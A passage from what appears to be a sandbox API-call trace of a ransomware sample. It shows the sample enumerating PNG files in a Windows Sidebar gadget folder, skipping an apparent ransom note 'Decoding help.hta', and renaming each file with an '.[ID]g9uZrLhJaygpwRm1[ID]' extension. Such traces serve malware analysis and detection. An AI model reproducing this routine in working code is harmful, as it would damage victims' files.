(lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="play_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" [0059.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" [0059.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.055] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf17664, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf17664, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb256a3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb46, dwReserved0=0x0, dwReserved1=0x0, cFileName="play_rest.png", cAlternateFileName="")) returned 1 [0059.055] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.055] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.055] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.055] lstrcmpiW (lpString1="Decoding help.hta", lpString2="play_rest.png") returned -1 [0059.055] lstrlenW (lpString="play_rest.png") returned 13 [0059.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.055] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="play_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" [0059.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" [0059.055] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.056] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf3d7c3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf3d7c3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb256a3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="prev_down.png", cAlternateFileName="")) returned 1 [0059.056] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.056] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.056] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.056] lstrcmpiW (lpString1="Decoding help.hta", lpString2="prev_down.png") returned -1 [0059.056] lstrlenW (lpString="prev_down.png") returned 13 [0059.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.057] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="prev_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" [0059.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" [0059.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.057] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf3d7c3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf3d7c3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb27cb9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc05, dwReserved0=0x0, dwReserved1=0x0, cFileName="prev_hov.png", cAlternateFileName="")) returned 1 [0059.057] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.057] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.057] lstrcmpiW (lpString1="Decoding help.hta", lpString2="prev_hov.png") returned -1 [0059.057] lstrlenW (lpString="prev_hov.png") returned 12 [0059.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.057] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="prev_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" [0059.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" [0059.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.058] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf89a81, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf89a81, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb27cb9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb58, dwReserved0=0x0, dwReserved1=0x0, cFileName="prev_rest.png", cAlternateFileName="")) returned 1 [0059.058] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.058] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.058] lstrcmpiW (lpString1="Decoding help.hta", lpString2="prev_rest.png") returned -1 [0059.058] lstrlenW (lpString="prev_rest.png") returned 13 [0059.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.058] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="prev_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" [0059.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" [0059.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.059] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf89a81, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf89a81, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb27cb9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="reveal_down.png", cAlternateFileName="")) returned 1 [0059.059] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.059] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.059] lstrcmpiW (lpString1="Decoding help.hta", lpString2="reveal_down.png") returned -1 [0059.059] lstrlenW (lpString="reveal_down.png") returned 15 [0059.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.059] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="reveal_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" [0059.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" [0059.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.060] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbafafbe0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbafafbe0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb31511c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0x0, dwReserved1=0x0, cFileName="reveal_hov.png", cAlternateFileName="")) returned 1 [0059.060] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.060] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.060] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.060] lstrcmpiW (lpString1="Decoding help.hta", lpString2="reveal_hov.png") returned -1 [0059.060] lstrlenW (lpString="reveal_hov.png") returned 14 [0059.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.060] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.060] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="reveal_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" [0059.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" [0059.060] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows 